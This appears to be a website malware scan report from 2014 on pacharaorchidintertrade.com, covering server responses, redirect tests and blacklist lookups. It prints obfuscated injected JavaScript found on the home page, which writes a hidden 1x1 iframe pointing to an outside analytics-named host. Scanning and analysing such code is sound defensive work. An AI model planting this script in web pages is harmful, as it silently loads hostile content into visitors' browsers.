Scanned pages/files
Request | Server response | Status |
http://pacharaorchidintertrade.com/ | 200 OK Content-Length: 1912 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
var UoaYW=document;function ixekV_(IPqcMJ){var ROVBw = "",FchmZybuaK=0;for(FchmZybuaK=IPqcMJ.length-1;FchmZybuaK >= 0;FchmZybuaK--){ROVBw+=IPqcMJ.charAt(FchmZybuaK);}return ROVBw;}function LgDLGtpg(vfpejwlolC){vfpejwlolC = vfpejwlolC.replace(/[\.]/g, "%");vfpejwlolC=unescape(vfpejwlolC);return ixekV_(vfpejwlolC);}function MnE_vpOF(){UoaYW.write("<style>.ziKoRZhTA{width:1px;height:1px;border:none;visibility:hidden}</style>");var dmiaXgrp="<iframe id=\"kLW__Co\" src=\"x\" class=\"ziKoRZhTA\"></iframe>";var PqSiNZf=dmiaXgrp.replace(/[\+x]/g,LgDLGtpg(".70.68.70.2e.6e.69.2f.73.72.65.73.75.2f.6f.66.6e.69.2e.73.63.69.74.79.6c.61.6e.61.2d.73.74.61.74.73.2f.2f.3a.70.74.74.68"));return PqSiNZf;}UoaYW.writeln(MnE_vpOF());
Antivirus reports:
http://restaurantparkhvar.com/js/index.php | HTTP/1.1 302 Found Connection: close Date: Wed, 08 Oct 2014 10:45:29 GMT Location: http://ww15.restaurantparkhvar.com/js/index.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Powered-By: PHP/5.3.3-7+squeeze21 | clean |
http://ww15.restaurantparkhvar.com/js/index.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://ww15.restaurantparkhvar.com/test404page.js | 404 Not Found Content-Length: 13177 Content-Type: text/html | clean |
http://www.google.com/adsense/domains/caf.js | 200 OK Content-Length: 258 Content-Type: text/javascript | clean |
http://a1.dnbizcdn.com/js/parking_caf_281_1409192.js | 200 OK Content-Length: 37944 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 08 Oct 2014 10:45:28 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 1912
Content-Type: text/html
X-Powered-By: PHP/5.3.25
...1912 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pacharaorchidintertrade.com
Referer: http://www.google.com/search?q=pacharaorchidintertrade.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pacharaorchidintertrade.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pacharaorchidintertrade.com/
Result: pacharaorchidintertrade.com is not infected or malware details are not published yet.